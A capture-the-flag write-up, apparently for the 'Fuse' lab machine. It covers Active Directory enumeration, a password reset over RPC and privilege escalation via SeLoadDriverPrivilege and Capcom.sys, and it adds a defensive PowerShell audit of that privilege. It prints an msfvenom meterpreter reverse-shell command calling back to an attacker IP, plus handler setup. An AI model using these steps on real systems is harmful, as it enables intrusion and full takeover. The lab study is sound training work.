Fuse was released on 13 June 2020 and is rated Medium.

From nmap we can see that we are dealing with an AD machine. Visiting port 80 redirects us to a DNS name; after adding this name to our hosts file we can view the page. It is a printer page containing the print job history, with valuable data such as usernames. After poking around a bit we concluded that we needed a password, and since a Kerberoasting attack did not work we needed something else. After a lot of trying we created a password list from the CSV files on the print page; it turns out there is a valid password in there, but the user has to change their password first.

After changing the password we were able to enumerate the machine and found other credentials, which gave us a shell via evil-winrm. After logging in we were able to get the user flag. This user has SeLoadDriverPrivilege enabled, which made us administrator on this machine.
nmap -sV -sC 10.10.10.193
In order to access the webpage, we need to add the following to /etc/hosts:
When we go to the webpage, we see the following:
By reviewing the CSV files, I found several users:
Enumerating SMB shares
I tried to enumerate SMB shares with crackmapexec using the found usernames, but that was not successful.
crackmapexec smb 10.10.10.193 -u usernames.txt -p '' --shares
After this I tried whether I could log in with one of the found usernames.
I tried some common passwords, and I also used words from the CSV files.
rpcclient -U 'bhult%Fabricorp01' 10.10.10.193
Changing RPC password
smbpasswd -r 10.10.10.193 -U bhult
rpcclient -U bhult 10.10.10.193
There is an svc-print user; we need to keep that in mind.
We found a password:
Now that we have credentials, we can log in with evil-winrm. The only user that could log in with the password ($fab@s3Rv1ce$1) was svc_print.
I checked whether we could use token privileges to escalate our privileges.
We can see that SeLoadDriverPrivilege is enabled.
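As an added defender-side check (not part of the original writeup), the following PowerShell lists which principals hold SeLoadDriverPrivilege ("Load and unload device drivers") on a host, by parsing secedit's user-rights export. The scratch file path is an assumption; run it from an elevated prompt.

```powershell
# Added audit helper, not part of the original writeup. Lists which accounts
# and groups hold SeLoadDriverPrivilege on this host. Requires admin rights,
# because secedit needs them to export the effective local security policy.
function Get-LoadDriverPrivilegeHolders {
    $inf = Join-Path $env:TEMP 'user_rights_export.inf'   # assumed scratch path

    # Export only the User Rights Assignment area of the effective policy.
    secedit /export /cfg $inf /areas USER_RIGHTS | Out-Null
    if (-not (Test-Path $inf)) { throw 'secedit export failed' }

    # The export is INI-style; the line of interest looks like
    #   SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550
    $line = Get-Content $inf |
        Where-Object { $_ -match '^SeLoadDriverPrivilege\s*=' } |
        Select-Object -First 1
    Remove-Item $inf -Force
    if (-not $line) { return @() }   # right is assigned to nobody

    $entries = ($line -split '=', 2)[1].Trim() -split ','
    foreach ($entry in $entries) {
        $entry = $entry.Trim()
        if ($entry.StartsWith('*')) {
            # A leading '*' marks a SID; translate it to an account name.
            $sid = New-Object System.Security.Principal.SecurityIdentifier `
                -ArgumentList $entry.Substring(1)
            try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $name = '<unresolved>' }
            [pscustomobject]@{ Sid = $sid.Value; Account = $name }
        } else {
            # Entries without '*' are already account names.
            [pscustomobject]@{ Sid = $null; Account = $entry }
        }
    }
}

# By default only Administrators (S-1-5-32-544) hold this right, plus
# Print Operators (S-1-5-32-550) on domain controllers. Any other entry,
# such as a service account, is a privilege escalation path worth reviewing.
Get-LoadDriverPrivilegeHolders | Format-Table -AutoSize
```

On a domain-joined host the effective assignment usually comes from a GPO, so a finding here should be traced back to the "Load and unload device drivers" setting in the applied policy.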
We need to follow the instructions on this GitHub page.
Note: this GitHub page is owned by IceL0rd. Secwalk won't/can't be held responsible for any damage or for its content.
Uploading Capcom.sys and eoploaddriver64.exe
Before we run this, we need to make an MSF payload which gives us a meterpreter shell.
Getting Meterpreter Shell
In order to generate a meterpreter payload we need to use the following command.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe -o meterpreter.exe
Now we upload this to the system.
Setting up the handler in Metasploit (the default LPORT of 4444 matches the payload).
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
run
Now we run meterpreter.exe and get a meterpreter shell.
Now we run eoploaddriver64.exe in our evil-winrm shell:
./eoploaddriver64.exe System\CurrentControlSet\custom C:\Users\svcprint\Documents\Capcom.sys
Now we get an error, but that is why we need Metasploit: it has a local exploit module that abuses this driver, and loading the driver is what just enabled it.
Back to our meterpreter session.
set session 1
But to get this to work, we need to edit this script.
We disable the check function.
Now we have rooted the machine.
Made by: IceL0rd
Disclaimer: Please use our posts for educational purposes only. Wrong usage could land you in jail.